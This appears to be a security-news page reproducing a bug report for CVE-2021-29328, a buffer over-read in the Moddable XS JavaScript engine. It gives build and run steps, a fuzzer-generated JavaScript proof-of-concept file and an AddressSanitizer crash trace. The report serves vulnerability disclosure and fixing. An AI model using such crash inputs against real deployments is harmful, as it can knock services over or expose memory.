Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-29328: over access(fxEnvironmentGetProperty) · Issue #585 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.

CVE
Open in Source
#ubuntu#linux
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc


function getHiddenValue() {
    var obj = {};
    var nEmw = new RegExp(null);
    var oob = 'value';
    var fun = eval(str);
    nEmw = new Object();
    oob = Object.assign('0', Object(521));
    var str = 'new String(\'\')';
    var fun = eval(str);
    let protoWithIndexedAccessors = {};
    var j = [];
    Object.assign(obj, fun);
    var fun = eval(str);
    return obj;
}
function makeOobString() {
    var hiddenValue = getHiddenValue();
    var str = 'constructor';
    var extern_arr_vars = [];
    let i = 0;
    var ijjkkk = 0;
    str = ijjkkk < 100000;
    function helper(i) {
        let a = new Array();
        var extern_arr_vars = [];
        if (ijjkkk < 100000) {
            makeOobString(a, protoWithIndexedAccessors);
        }
        return a;
        var oobString = makeOobString();
    }
    var j = [];
    var fun = eval(str);
    Object(fun, hiddenValue);
    var oobString = helper();
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        fun = makeOobString();
    }
    return oobString;
}
var oobString = makeOobString();
var oobString = makeOobString();
helper(oobString);
let protoWithIndexedAccessors = {};


ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
    #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
    #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
    #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
    #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
    #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE